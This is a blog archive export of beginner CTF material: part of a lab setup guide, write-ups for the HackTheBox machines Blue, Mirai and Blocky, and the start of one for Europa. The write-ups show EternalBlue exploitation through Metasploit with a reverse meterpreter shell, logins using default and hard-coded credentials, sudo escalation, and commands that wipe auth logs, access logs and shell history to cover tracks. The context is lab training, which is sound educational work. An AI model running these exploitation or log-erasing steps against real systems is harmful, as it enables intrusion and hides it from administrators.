guess? Look up how to whitelist the files/process in your AV\u0026rsquo;s documentation.\n6. Setting Up the Bulldog CTF VM # We can set up the Bulldog OVA in the same manner that we set up the Kali OVA. If you double click the OVA file, it will likely open a second instance of VirtualBox if you still have it open from Kali.\nJust go to File -\u0026gt; Import Appliance, and select the Bulldog OVA.\nThis OVA comes with default settings practically ready to go, so just load it up and press \u0026ldquo;Import\u0026rdquo; if you are happy with where it will be stored on your machine.\n\u0026hellip;BUT DON\u0026rsquo;T GO BOOTING BULLDOG JUST YET! # In order to isolate/connect the VM\u0026rsquo;s to each other, you will need to change their virtual network adapters to be connected to the host-only network. This disconnects the VM\u0026rsquo;s from the internet, and makes it so they can only \u0026ldquo;see\u0026rdquo; the host machine and each other. If we wanted to, we could keep the Kali machine connected to the internet, but for the sake of uniformity , I chose to make both machines host-only.\nClick on the yellow \u0026ldquo;Settings\u0026rdquo; gear with one of the boxes selected. Then select the \u0026ldquo;Network\u0026rdquo; section, and in the \u0026ldquo;Attached To:\u0026rdquo; dropdown menu, select \u0026ldquo;Host-only Adapter\u0026rdquo;\nDo this for both boxes, and we will be ready to go! If you boot up Bulldog, you will not be able to log in. That is because you have to HACK in. Most CTFs are not designed for you to log in normally, we are going to have to create ourselves an alternative method of entry.\nBoot up Bulldog. After some setup, you should see a screen like this:\nThe IP address should be on the same network as the Kali box - by default this will be 192.168.56.xx If you see that, you are all ready to go!\nIf you don\u0026rsquo;t see something like the image above, check your installation steps again.\nA Quick Note About Networking VMs - it is often annoying: # This process will work for Bulldog, but it seems to be set up for Host-Only Networking via Virtualbox.\nNot every CTF VM you try will work with this process. Some VM\u0026rsquo;s are meant to be connected via bridged mode, some via NAT.\nOthers take more naturally to VMWare than VirtualBox. You may need to employ some trial and error for other boxes.\nYou are ready to move on to Part Two!\n","date":"17 January 2018","externalUrl":null,"permalink":"/archive/your-first-ctf/yourfirstctf-1/","section":"Archive","summary":"Get your first hacking lab running! Walk through setting up virtual machines, connecting them, and prepping your tools. No experience needed!","title":"Your First CTF 1 - Intro and Setup","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # This write-up is broken into two sections: The process I used when I first solved this box, and my current process. Treat part 1 as optional.\nBlue was my VERY FIRST Capture the flag, and will always be one I remember. With no experience and minimal knowledge of Kali, I solved it using GUI tools, educated guesses and lots of clicking around.\nThis box serves as a showcase for what might have been the most widely known vulnerability of 2017. It isn\u0026rsquo;t the most challenging, especially with context, and might be good as your first CTF, as it was mine.\nPart 2 is written with the idea that the reader has beginner knowledge of pentesting, or at least a basic idea of how Metasploit and nmap work. I used Kali, but the tools are available for other distros and come packaged with most pentesting OS\u0026rsquo;s like BlackArch. It details the process I would use today had I been attempting the CTF for the first time.\nPart 1 is written more like a rambling blog post detailing my mindset and process from when I first attempted it. It might use fewer steps than my current process, but that is because I found the box\u0026rsquo;s name to be a clue big enough to shut down the British NHS.\nPart 1 - The Newbie Process # I\u0026rsquo;d been running Kali for a while, but had been using it to edit text files and get familiar with the command line - no pentesting at all. I had weaseled my way into a Hack The Box invite code, but had never even run nmap before. Perhaps it was time to try these \u0026ldquo;Capture the Flags\u0026rdquo; for real. Armed with Kali and all the searches the internet could provide me, I logged on to HackTheBox and went to see if I could make sense of anything I saw.\nThere were some IP addresses and difficulty ratings, but nothing caught my eye as a place to start. With no idea what else to do, I attempted to place this list of machines into context.\nBy paying attention to Cybersecurity news (mostly by listening to the Cyberwire podcast) I had learned some interesting terms and concepts, but had no context or practical knowledge. The big cybersecurity stories of the year so far had been WannaCry and NotPetya. I knew Wannacry was a huge ransomware attack that was infecting Windows server machines all over the world, despite a well-known patch that had been released. Hospitals had to divert ambulances, businesses had to shut down, and some conniving crooks out there were raking in the big bucks $300 in Bitcoin at a time.\nThese attacks were particularly noteworthy because of the vulnerability they exploited. CVE-2017-0144 came to light after it was published by a group known as the Shadow Brokers. They claimed to have stolen an exploit that took advantage of this vulnerability from the \u0026ldquo;Equation Group,\u0026rdquo; which is widely believed to be the United States National Security Agency.\nThis secret weapon had been stolen a government cyber-armory and was placed into the hands of hackers all over the world. Patches were released in March, but not enough systems had employed them before WannaCry burst on to the scene in May. The exploit used in the attack was commonly known as \u0026ldquo;EternalBlue.\u0026rdquo;\nThis is what I knew about EternalBlue at the time I sat down at HTB for the first time:\nIt affected certain Windows machines (Which ones? Who knew?) It was called EternalBlue That\u0026rsquo;s it. I had no idea what services it exploited and couldn\u0026rsquo;t recall what access it granted.\nWith this information bouncing around inside my head somewhere, I looked for the CTFs with the lowest difficulty ratings. Something clicked in my head when I saw this:\nBlue + Windows + (current year = 2017) + Easy = This machine must crack under EternalBlue!\nOf course! This information was sure to carry me to the legendary flag I had heard needed to be captured. I just needed to implement my strategy and it would be mine.\nHowever, my grand revelation had not provided me an idea of what to actually do. So, I began clicking around on Kali to get my bearings and looking for some kind of lead. In the default applications dock was Armitage, and I looked it up online to find out it was a graphical front end for Metasploit. I had heard Metasploit was very effective, but had no idea what it looked like or how it was operated. I wondered, \u0026ldquo;if this Metasploit is so useful, surely I should be able to use it to wield EternalBlue?\u0026rdquo;\nMetasploit was a mystery, but I did know how to look at graphics. Armitage seemed to be a good place to start. I clicked all the default options upon startup and I found myself looking at some folders, a empty void and a console. After browsing through the options at the top of the page, I decided I might need to add a target. I went to \u0026ldquo;Hosts\u0026rdquo; and selected \u0026ldquo;Add Hosts.\u0026rdquo;\nI supposed I needed to enter \u0026ldquo;10.10.10.40\u0026rdquo; - the box IP\nI now had a monitor icon representing a machine. I noticed there was a search box under the folders, so I went ahead and entered \u0026ldquo;blue\u0026rdquo;\nThat last result looked very promising! I didn\u0026rsquo;t know any other name for the exploit besides \u0026ldquo;EternalBlue,\u0026rdquo; but the fact that there was as \u0026ldquo;17\u0026rdquo; in the title suggested this was the the exploit I needed. I clicked on the \u0026ldquo;target\u0026rdquo; machine, then on the eternalblue line. An options Window came up, but I didn\u0026rsquo;t know how to interpret any of those options, so I just hit enter. The console buzzed to life, and the machine\u0026rsquo;s icon changed.\nIt turned red! There was lightning! I MUST be a hacker now. Had I just used an NSA secret weapon? Woooooaaaaaaaah.\nI didn\u0026rsquo;t know how to move forward, so I attempted my tried and true method: clicking on things until something happened. I struck gold when I right-clicked the box icon and saw the \u0026ldquo;Interact\u0026rdquo; option - a Windows command line appeared in the bottom console.\nAt this time, I could stumble around the Linux command line with some effectiveness, but in Windows I was fumbling around in the dark. All I knew was cd , dir which proved to be just barely enough to get around, albeit slowly.\ncd .. cd .. dir cd Users dir I knew that I had to capture the \u0026ldquo;System\u0026rdquo; and \u0026ldquo;User\u0026rdquo; flags - so I assumed \u0026ldquo;haris\u0026rdquo; was the user, and \u0026ldquo;Administrator\u0026rdquo; was the path that lead to the system flag.\ncd Administrator cd Desktop dir At this point, I knew I had to read the file, but cat didn\u0026rsquo;t work! My windows command line knowledge had been depleted! A quick online search lead me to type and my first flag was captured!\ntype root.txt.txt It was very exciting, and I immediately set out on the next boxes, stumbling along into new knowledge.\nPart 2 - A More Current Strategy # It hasn\u0026rsquo;t been very long since I captured that flag the first time, but my process has changed dramatically. That time has been spent learning and practicing, and I have even developed something of a methodology. Here is how I would attempt the box today, with a bit more experience under my belt.\n\u0026ldquo;Blue\u0026rdquo; still provides some context, HackTheBox boxes don\u0026rsquo;t provide an exceptionally high amount of information ahead of time. A good scan is in order.\nnmap -sV -F -T4 10.10.10.40 -oA nmap_fast_scan\nMost of the CTF\u0026rsquo;s I have done so far revolve around a HTTP port, and aren\u0026rsquo;t Windows machines, so I am a bit out of my element. I should try to get more information - some deeper nmap scanning should help with this.\nnmap -sV -sC --script=vuln 10.10.10.40 -oA nmap_fullscan_blue\nWhile this is running, I\u0026rsquo;ll search for some information about possible vulnerabilities based on the information I do have.\nI tried Findsploit, but didn\u0026rsquo;t find anything too interesting. These ports are pretty unfamiliar to me, so I\u0026rsquo;ll do some research about what I am dealing with. Research on the rpc port reminds me that I can use the enum4linux tool\nenum4linux 10.10.10.40\nThis command mostly informed me that the scanned ports were off-limits. It doesn\u0026rsquo;t seem like a way to move forward. The same was true for nbtscan and smbmap.\nWithout the context of \u0026ldquo;Blue\u0026rdquo; - this box didn\u0026rsquo;t provide me much I recognized. Even though I did know that the box was named Blue, I decided to pretend that I had never heard of the exploit I new I needed. This way I can test my process and see if I would \u0026ldquo;discover\u0026rdquo; the exploit I needed.\nWhile I had been searching for information about the ports and not finding anything to grab on to, nmap finished the deeper scan. It produced a very, very interesting result.\nWhat is this mysterious \u0026ldquo;ms17-010\u0026rdquo; of which it speaks? Maybe Findsploit has something about this? Remote Code Execution is exactly what I\u0026rsquo;d like to have.\nHow convenient: Metasploit has both a scanning and exploitation module for this vulnerability.\nmsfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 10.10.10.40 run The scanning module reports that we have a decent chance of success if we run the exploit, so let\u0026rsquo;s do it.\n* use exploit/windows/smb/ms17_010_eternalblue\n\u0026ldquo;EternalBlue,\u0026rdquo; eh? Maybe that is how the box got its name. Hmm\u0026hellip;\nshow options\nAs of this writing, I am still pretty green when it comes to the Windows command line. To circumvent this issue, let\u0026rsquo;s make sure our payload is Meterpreter.\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nMake sure your Meterpreter IP is set to your HTB VPN IP\nset LHOST 10.10.14.10 set RHOST 10.10.10.40 run Once again, it is just really cool to know that you\u0026rsquo;ve used an NSA cyberweapon!\ngetuid getuid tells us we are the boss of this system, and can go ahead and grab whatever flags we wish.\ncd /Users/Administrator/Desktop ls cat root.txt.txt ls /Users haris appears to be the name of our flag-holding user.\ncd /Users/haris/Desktop ls cat user.txt.txt Now, all that is left to do is clean up using the built-in meterpreter methods.\nclearev Thanks to HackTheBox for making such an approachable and timely CTF!\n","date":"12 January 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/blue-htb/","section":"Archive","summary":"","title":"CTF Writeup: Blue on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Mirai on HackTheBox highlights a fundamental truth about penetration testing that sounds laughably obvious:\nPentesting usually requires operating a computer.\nIt sounds silly, but when I was was a complete beginner, the system management aspects of pentesting simply were not on my radar. I had expected pentesting to be all exploitation modules and reverse shells. We run hack_the_root.exe, some sinister-looking ASCII art comes up on the screen, maybe run a command or two, and we\u0026rsquo;ve owned the system.\nThis CTF isn\u0026rsquo;t solved by running a high-tech exploit stolen from the NSA, by reverse engineering an application to find a way to inject code, or by intercepting some secret communication containing sensitive information. To capture this root flag, you\u0026rsquo;re going to need to understand how Linux works. You don\u0026rsquo;t need to be advanced enough to be a professional sysadmin, but you will need to be able to ask and answer the right questions about the system you are operating.\nThis write up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work.\n1. Initial Scans # nmap -F 10.10.10.48 -oA nmap_fastscan nmap finds ports for SSH, HTTP and domain. Let\u0026rsquo;s go after the HTTP and see what we can see.\nnikto -h 10.10.10.48 -o nikto_result.txt While nikto is running, we can visit the website in the browser and take a look.\nZilch. Hopefully nikto can tell us more than this blank page.\nnikto finds a few interesting tidbits:\nThe site contains the label \u0026ldquo;x pi-hole: A Black hole for Internet advertisements\u0026rdquo; /admin/index.php seems like an interesting directory We could run dirsearch to find more interesting directories, but let\u0026rsquo;s first check out what we have.\n2. Getting to the Bottom of the Pi-Hole # The term \u0026ldquo;Pi-Hole\u0026rdquo; was new to me, so I searched around online. I learned it was a program built to serve as a DNS server that simply prevents advertisements from loading. Seems like a useful system, and based on the name and iconography, it can run on a Raspberry Pi.\nThe /admin/ page contains a link named Login. Maybe we can gain access there.\nUpon first glace, I noticed that the page only asked for a password, but no username. Then, something clicked loudly in my head.\nI want to log in, but I need a password. If I log in, I will gain access to something that is likely a Rasperry Pi - an IoT device. Mirai is an extremely successful botnet that gained access by merely trying the default credentials to IoT devices. If the use of default passwords worked well enough create a globally significant botnet, they might be good enough for us, too.\nUltimately, I found the password in a reddit post.\nThis post contained the full credentials, both username and password. Web access is nice, but with full creds we can go right after SSH.\nssh pi@10.10.10.48 password: raspberry 3. Privilege Escalation # Who needs hack_the_user.exe when we\u0026rsquo;ve got SSH credentials?\nls ls Desktop cat Desktop/user.txt If this really is an IoT device, we probably won\u0026rsquo;t have too much to enumerate. A Pi-hole will probably be set up to do its job, and not much else. This will not require multiple users of different privilege levels.\nMaybe our pi user can run some commands as root.\nsudo -l Our pi user can run ALL commands as root. Without a password, even.\nsudo su Who needs hack_the_root.exe when we have sudo su? So far, this CTF has been pretty easy. Perhaps too easy\u0026hellip;\nls /root cat /root/root.txt Getting a user shell was as easy as searching online for default credentials. PrivEsc was as easy as it could possibly be. We didn\u0026rsquo;t even need a password!\nNow we get to the real challenge: finding the root flag.\n4. How Do You Lose a Root Flag, Anyway? # I lost my original root.txt! I think I may have a backup on my USB stick...\nWhat do you mean, you \u0026ldquo;lost\u0026rdquo; the root flag?\nThat\u0026rsquo;s not how this is supposed to work!\nWe, the heroic pentesters, are supposed to come in with our honed skills and powerful payloads to slip through the cracks in the system and capture the flag. Mirai, all you were supposed to do was simply hold the flags and wait patiently for us to politely take them off your hands! We even got ourselves root access, and you have permission to hand it over.\nSince we successfully escalated our user privileges, you could argue that the penetration testing aspect of this CTF is over. There are no Metasploit modules to run or hashes we need to crack. We own this box, nothing is off limits.\nIt\u0026rsquo;s time to take off our pentester hats. We\u0026rsquo;re sysadmins now, and we need to use our knowledge of the filesystem to hunt down our backup root.txt file. But, we have to know where to look.\nOur last clue mentioned a USB Stick. By default, files stored on mounted flash drives can be found in the /media directory.\nls /media A folder called usbstick - paydirt.\nls /media/usbstick Wouldn\u0026rsquo;t our root.txt file be named root.txt? Maybe not, but damnit.txt doesn\u0026rsquo;t bode well as an alternative.\ncd /media/usbstick cat damnit.txt Tough break, James. We\u0026rsquo;ve all accidentally deleted a file. Perhaps there are more clues in this folder.\nls -la ls -la lost+found/ These two commands can be executed at the same time using ls -laR\nNo luck. There isn\u0026rsquo;t anything we can see in this directory.\nOur latest clue says James accidentally deleted the files\u0026hellip; How could James have done this on a system like ours?\nIf the system has a Desktop environment, James may have accidentally dragged the directories into the Trash. An unfortunate combination of the rm command and * character. Let\u0026rsquo;s investigate the click-and-drag theory first.\nIf the files were removed from the /media/usbstick directory and dragged into the Trash. they may still be there. I couldn\u0026rsquo;t quite remember where this trash would be located, so I ran a find command to find likely candidates.\nfind / -name \u0026quot;*Trash*\u0026quot; This command recursively searches for files and directories with Trash anywhere in their name, starting at the / directory.\nLet\u0026rsquo;s see what\u0026rsquo;s inside:\nls -la /home/pi/.local/share/Trash ls -la /home/pi/.local/share/Trash/files/ ls -la /home/pi/.local/share/Trash/expunged/ ls -la /home/pi/.local/share/Trash/info/ Using ls -laR /home/pi/.local/share/Trash/ would complete all these commands at the same time. For illustrative purposes, I have shown them one by one.\nAgain, nothing we can see. You can check the other location find found, but it\u0026rsquo;s empty as well. Since this possibility hinged on the fact that our IoT device was operating with a desktop environment, it was never particularly likely in the first place.\nJames probably uses SSH to access the Pi-Hole, just like we do. From his CLI, he was probably attempting to rm the contents of subdirectory of the /media/usbstick folder and left out a few characters.\nInstead of typing something like rm -r /media/usbstick/subdirectory/*, James probably made a careless omission and typed rm -r /media/usbstick/*. This simple mistake rm\u0026lsquo;ed all the files on the USB stick, instead of the files in the subdirectory.\nThis repeated use of rm is may be good news for us, surprisingly.\nrm has our system \u0026ldquo;forget\u0026rdquo; where the file is stored by deallocating its memory location. The file\u0026rsquo;s contents may still be stored on the flash drive, just without the information that allows our system to \u0026ldquo;see\u0026rdquo; the file. The file be eventually overwritten, but if we act quickly we may be able to salvage it.\nWhile /root/root.txt has been overwritten, the backup location on the USB stick has just been deleted. The /media/usbstick directory does not contain a file named root.txt, so there is a decent chance this file was merely deallocated. After clearing the contents of the /media/usbstick directory, James likely created damnit.txt instead of altering an existing root.txt and renaming it.\nIf the backup version of root.txt containing the flag was on the USB stick - we are going to have to go one level deeper. While the drive is mounted to /media/usbstick, the drive\u0026rsquo;s filesystem is \u0026ldquo;seen\u0026rdquo; by our system as a separate device.\nOur backup file\u0026rsquo;s data has got to be on that device.\n5. Where is that USB Stick? # At this point, I theorized that we might have to use digital forensics methods to recovery this information. However, at this point, I had no idea how that could actually be done.\nSo, I turned to my favorite resource: Ben Clark\u0026rsquo;s Red Team Field Manual. I knew that I needed to find how our system organized its filesystem and attached devices, so I simply started at the beginning of the *nix section and read descriptions until something that looked like it might fit that context appeared.\nOn the very first page of the *nix section, I found a section called Linux System Info. It seemed like the perfect place to start.\nOne line caught my eye:\ndf -h - Disk Usage(free)\nThe flash drive is a disk, right? I\u0026rsquo;d love to know how it is being used.\ndf -h A rather small, 8.7MB disk is mounted to /media/usbstick. Our system calls it /dev/sdb. I know we have a /dev directory - maybe we can just cd inside?\ncd /dev/sdb cd tells us that we aren\u0026rsquo;t dealing with a directory. file can tell us what it is.\nfile /dev/sdb I didn\u0026rsquo;t find this answer particularly informative. What am I supposed to do with a \u0026ldquo;block special\u0026rdquo; anyway?\nI\u0026rsquo;d heard the phrase \u0026ldquo;everything on Linux is a file,\u0026rdquo; so I did what I always do with files. I tried to read it.\ncat /dev/sdb This file doesn\u0026rsquo;t look like it is intended to be read by humans. This doesn\u0026rsquo;t need to stop us from trying, however. The strings command will pull out only the human-readable characters from each line.\nstrings /dev/sdb I\u0026rsquo;ve obfuscated it in the image above, but under that grey rectangle is an md5 hash.\nIt\u0026rsquo;s found right under the word root.txt. Just under that is damnit.txt, directly followed by the text that was in the damnit.txt file we read earlier.\nThis can only mean this stray hash is our root flag - especially since on HTB machines, the flag always takes the form of an md5 hash.\nFlag captured!\n6. Quick Cleanup and Conclusion # We\u0026rsquo;ve claimed our prize, so let\u0026rsquo;s put our pentester hats back on and cover our trail. We aren\u0026rsquo;t going to make ourselves completely invisible, but let\u0026rsquo;s use a few of the commands that the Red Team Field Manual recommends we use to cover our tracks.\nThis is optional, but it\u0026rsquo;s the polite thing to do when sharing a CTF machine with other users. We wouldn\u0026rsquo;t want to leave spoilers behind on the machine and ruin someone else\u0026rsquo;s hard work.\necho '' \u0026gt; /var/log/auth.log - replaces the authorization log with a blank file. echo '' \u0026gt; ~/.*sh_history - blanks out all shell history files for root echo '/home/pi/.*sh_history - blanks out all shell history files for pi history -c \u0026amp;\u0026amp; su pi - clears the command history for root and switches to the pi user history -c \u0026amp;\u0026amp; kill -9 $$ - clears the command history for pi and exits the box The RTFM uses echo '' \u0026gt; ~/.bash_history, which is slightly different than what I like to use. Using .*sh_history will blank out all shell history files, not just bash.\nMirai was the second CTF I ever completed, and I got a lot out of it. Wandering almost completely blindly into the world of CTFs, I had no concept of what I was going to need to learn and what concepts would arise. This box demonstrated that we aren\u0026rsquo;t always just looking to become a root user, but sometimes we have to act like one.\nThanks for reading! # ","date":"10 January 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/mirai-htb/","section":"Archive","summary":"","title":"CTF Writeup: Mirai on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Blocky is a fun beginner\u0026rsquo;s box that was the second or third CTF I ever attempted. At that time, I had booted up Kali and knew that a couple tools existed, but had very few strategies, context or experience. All the boxes I had solved so far had used default passwords or simply were CVE-2017-0144 insta-rooted with Metasploit.\nThis box will begin to give you a good understanding of the power of the tools at your disposal. By stumbling around trying out tools that I saw were part of the Kali suite, I began to figure the important concepts and found myself learning very quickly.\nIf you have never tried a CTF before, this box would be a nice place to start - assuming you can get past the HackTheBox Invite process.\nThis write up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work. The tools come with a stock Kali installation, unless otherwise mentioned.\n1. Initial Scans # All HackTheBox CTFs are black-box. All we have is an IP. IPs should be scanned with nmap.\nnmap -sV -T4 10.10.10.37\nThe -sV flag attempts to tell us the software used on each port found The -T4 flag tells nmap to use more CPU threads, and thus run faster nmap finds 21, 22, and 80. These are the default ports for FTP, SSH and HTTP. It also finds 8192, but we can come back to that later if we stall. I like to start with HTTP.\nKali categorizes most of the HTTP tools under \u0026ldquo;Web Application Analysis,\u0026rdquo; so I took a peek and tried to get most of them working. Since starting out, I found that the most useful tools to start with on web page CTF\u0026rsquo;s are nikto and dirsearch.\nnikto -h http://10.10.10.37 -output nikto_blocky.txt\nOur -h flag tells nikto the location of our target, and the -output flag creates an easily revisited log of the results.\nMy nikto scan didn\u0026rsquo;t actually finish until after my dirsearch, and ended up not telling me anything dirsearch didn\u0026rsquo;t tell me already. This will not always be the case, so I ofte run both.\ndirsearch is a web directory bruteforcer implemented in python3. Alternatively, you can use dirb or dirbuster, which come with Kali, or another program such as gobuster.\nI cloned it using\ngit clone https://github.com/maurosoria/dirsearch /opt/dirsearch\nand ran it with\npython3 /opt/dirsearch/dirsearch -u \u0026quot;http://10.10.10.37\u0026quot; -e sh,txt,php,html,htm,zip,tar.gz,tar --plain-text-report=dirsearch_europa_http_quick -t 25\n-u points to our URL starting point -e lists some common file extensions to look for. Most of the time php,html,txt is enough --plain-text-report= specifies that we want to save the results to file -t 25 allocates dirbuster more CPU threads We find a whole bunch of paths that look interesting. The fact that we have directories that begin with wp-... is a good place to start. This means our site runs on Wordpress, which is associated with quite a few vulnerabilities. The WPScan tool will help us find any that are present on this site.\nwpscan -u http://10.10.10.37 -e uvp | tee wpscan_block.txt\nThe -e uvp flag enumerates users and looks for vulnerable plugins, and | tee ... saves the output to a file we can come back to later.\nWPScan finds many, many vulnerabilities we can dive into, but lets keep enumerating to make sure we get the full lay of the land.\n2. Using our Reconnoitered Information to Dig Deeper # Let\u0026rsquo;s review what we have so far:\nWe\u0026rsquo;ve found the username notch We\u0026rsquo;ve found 2 places to log in on the site, phpmyadmin and wp-login A 3rd login exists at SSH. If we get phpmyadmin database access, we may be able to find some credentials to login somewhere else, or drop in some kind of reverse shell. If we get Wordpress admin access, we can spawn a reverse shell pretty easily.\nMaybe the site has some more useful information. It looks like a simple Wordpress blog with only one post. Let\u0026rsquo;s read it.\n\u0026quot;\u0026hellip;developing a wiki system\u0026hellip; and a core plugin\u0026hellip;\u0026quot; Perhaps some of that is already deployed to the site. Let\u0026rsquo;s revisit our dirsearch results.\nWe have both the /wp-content/plugins folder, where wpscan found the akismet plugin, and a separate /plugins directory.\nThis is atypical for a Wordpress site, and somewhat suspicious. Why would it have both?\nTwo .jars are here for us to download. The Core plugin was mentioned in the blog post, so let\u0026rsquo;s start there.\nwget http://10.10.10.37/plugins/files/BlockyCore.jar unzip BlockyCore.jar -d blockycore\ncd blockycore ls -laR *\nI don\u0026rsquo;t know too much about Java, but Blockycore.class may have something for us. Can we just read it and find something interesting?\ncat com/myfirstplugin/BlockyCore.class\nThis file appears to have been compiled and has some lines we can\u0026rsquo;t read. We can isolate the human-readable parts with the strings command.\nstrings com/myfirstplugin/BlockyCore.class\nThere are some strings that look useful, but it\u0026rsquo;s hard to to tell without more context.\nI did some online searching and come across the javap command, which can be use to disassemble Java classes. I believe I had to to install it using apt-get\njavap -c com/myfirstplugin/BlockyCore.class | tee ~/CTF/blocky/blockycore_disassembled.txt\nThat\u0026rsquo;s the kind of detail I like to see! sqluser and sqlpass are VERY promising. These credentials will likely get us into the phpmyadmin database, and might even be re-used elsewhere.\n3. Gaining Webserver Access # When I first attempted this box, I got stuck here for a few hours. I knew I was missing something very simple, but couldn\u0026rsquo;t find my way through all the information I had at my disposal. The pieces were too disorganized to fit together.\nWhat I should have done was get things clearly laid out by taking another inventory of all that had been found.\nSo far, we have:\nUsernames:\nnotch - from the WP site root - exists by default for SSH and phpmyadmin, seen in plugin code admin - exists by default on Wordpress Passwords:\n8YsqfCTnvxAUeduzjNSXe22 - from the plugin code and\nLogin Areas:\nWordpress phpmyadmin ssh Let\u0026rsquo;s try root:8YsqfCTnvxAUeduzjNSXe22 as phpmyadmin credentials.\nGreat, we\u0026rsquo;re in the database. Odds are we are going to find hashes here that will lead to the Wordpress password. Before we go trying to finding and cracking them, however, let\u0026rsquo;s keep it simple. We should first try logging in with our credentials somewhere else.\nI\u0026rsquo;m feeling optimistic; I say we go right for the big fish - root via SSH.\nssh root@10.10.10.37\nand give the password when asked.\nDidn\u0026rsquo;t hurt to try, as unlikely as it was. Since we only have a few usernames, and only one password candidate, it is feasible to simply try them all. Since SSH access is easier to work with than a webshell, let\u0026rsquo;s try to get in here before trying wp-admin access.\nssh notch@10.10.10.37\nWe\u0026rsquo;re in!\n4. Capturing the User Flag # ls /home ls -la /home/notch cat /home/notch/user.txt\nA little prior knowledge tells me that Notch is the inventor and boss of the Minecraft universe - Could this mean he is the admin of this system? Let\u0026rsquo;s find out what we can run as superuser.\nYup, he\u0026rsquo;s an admin. This could be all we need to know to gain root access.\nsudo su\nWe have a root shell, and it feels good\n5. Call Me Markus # From here, it is as trying to read the root flag.\nls /root cat /root/root.txt\nSuccess! Grab the root flag and let\u0026rsquo;s clean up.\nNOTE: These are some pretty simple cleanup commands meant to cover our tracks a little bit, but only a little bit. A trained admin would notice that these files have been altered, so look at these commands as the beginning of your tracks-covering career and not as a MIB-Style mind wipe.\necho '' \u0026gt; /home/notch/.bash_history echo '' \u0026gt; /var/log/auth.log echo '' \u0026gt; /var/www/admin/logs/access.log echo '' \u0026gt; /root/.bash_history\nExit the root shell with\nhistory -c \u0026amp;\u0026amp; kill -9 $$\nRepeat this command as notch, and you\u0026rsquo;re all done.\nPost-Mortem # This box was an easy target because of insecure setup, not any vulnerable applications that we had to exploit.\nInformation Disclosure via Hard Coded Credentials\nBlocky-Core.jar disclosed sqlpass\nInformation doesn\u0026rsquo;t get much more sensitive than a superuser password, and ours was found practically in the clear in a publicly accessible file.\nCredential Reuse\nsqlpass was the same as the user password for notch\nThere was no good reason why notch\u0026rsquo;s user password needed to be the same as the sqlpass.\nThanks to HackTheBox and Arrexel!\n","date":"9 December 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/blocky-htb/","section":"Archive","summary":"","title":"CTF Writeup: Blocky on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Solving this box was a great example of my learning process - trial by fire. I\u0026rsquo;ve been attempting to do tons of CTFs, whether I am ready for them or not. I often run into the limits of my knowledge, and often fail to conquer the box on the first try. This method is summed up by a phrase I\u0026rsquo;ve borrowed from a Childish Gambino song: \u0026ldquo;I did everything I could, then I kept going.\u0026rdquo;\nEssentially, this method consists of trying everything I know how to do while being ready for the possibility that I will need to use knowledge I do not have. At least, knowledge I did not have when I began the CTF. I then try to scour the web for details on where I think the holes in my knowledge lie. If I can\u0026rsquo;t find them, I\u0026rsquo;ll put the CTF down for a while, learn somewhere else and return when I think I\u0026rsquo;ve found something.\nOn this box, I was introduced to some concepts that were new to me, but found a way to learn about them on the fly and eked out some kind of solution. I\u0026rsquo;m not sure if my process was the most efficient, elegant, or professional, but at the end of the day, I had the root flag.\nThis CTF is from HackTheBox, which requires the solving of a mini-CTF in order to join. I think the invitation process is more difficult than some of the beginner VMs, in fact.\nThis write up is not meant to be an introduction to Pentesting. It shows my process and assumes the reader has beginner-intermediate knowledge. I use Kali, but any Pentesting-ready distro, such as BlackArch will have the right can get the tools to get the job done.\n1. Initial Scans # Like all HTB Machines, we have a black box test. All we have is an IP and a nickname - so we need to scan, scan, scan.\nI\u0026rsquo;ve started to formalize my process in an attempt to be more methodical. On my Pentesting box, I have a \u0026ldquo;CTFs\u0026rdquo; directory at /root/CTFs - this is where I put the working directory for a given attempt at a system.\nThe next formalization step is the use of some custom scripting for efficiency\u0026rsquo;s sake. My nmap process begins with my benmap.sh script, which aggregates my most commonly used nmap commands.\nFirst, it creates the ~/CTFs/BOXNAME directory, and opens a new file called NOTES_BOXNAME.txt in gedit.\nNext, it runs nmap with -F flag to find the commonly used ports. In the likely event that we find something here, we can dive right in.\nIt saves the found ports to a file, then runs with -sV targeting the found ports to identify the versions used.\nThis output is saved to some files called nmap_BOXNAME_fastports.gmap, .nmap and .xml\nThis process is repeated with a scan of all TCP ports. nmap finds the open ports, outputs them to a file, then runs with -sV that targets only the found ports and outputs a file with their versions.\nLastly, it runs with the --script=vuln flag to find some vulnerabilities on the ports found with the TCP scan. Only the found ports are targeted.\nUsually, we can get started after the fastport scan. It is not a particularly complicated script, but if you are interested, check it out.\n./benmap.sh europa 10.10.10.22\nFastports finds SSH, HTTP and HTTPS.\nnikto and dirsearch constitute my opening salvo for HTTP, which is where I like to start.\nnikto -h http://10.10.10.22 -output nikto_europa_http.txt dirsearch -u \u0026quot;http://10.10.10.22\u0026quot; -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar --plain-text-report=dirsearch_europa_http_quick -t 25\nNeither scan turns up anything particularly interesting. Let\u0026rsquo;s try the eyball scan.\nVisiting the site in the browser doesn\u0026rsquo;t show much either, at least when we use HTTP. Perhaps we can learn something from the HTTPS site.\nInvalid SSL certificate, eh? Probably self-signed. Let\u0026rsquo;s see what it says, maybe it has some useful info.\nThe cert is for www.europacorp.htb and admin-portal.europacorp.htb. Admin-portal sounds the most interesting, so let\u0026rsquo;s add it to a line in the /etc/hosts file.\n10.10.10.22 admin-portal.europacorp.htb\nThere may be more useful information in the certificate. First, we click \u0026ldquo;Add Exception\u0026rdquo; and then \u0026ldquo;Confirm Security Exception\u0026rdquo; - BE VERY CAREFUL DOING THIS IN REAL LIFE. Since we are dealing with a closed system CTF, it is okay this time.\nNext, click the lock next to the URL bar, then click the right-facing dropdown arrow, followed by the \u0026ldquo;More Information\u0026rdquo; button. This brings up an information window page in the browser.\nClick \u0026ldquo;View Certificate\u0026rdquo; to bring it up, and let\u0026rsquo;s see if we can find anything else interesting. Hit the 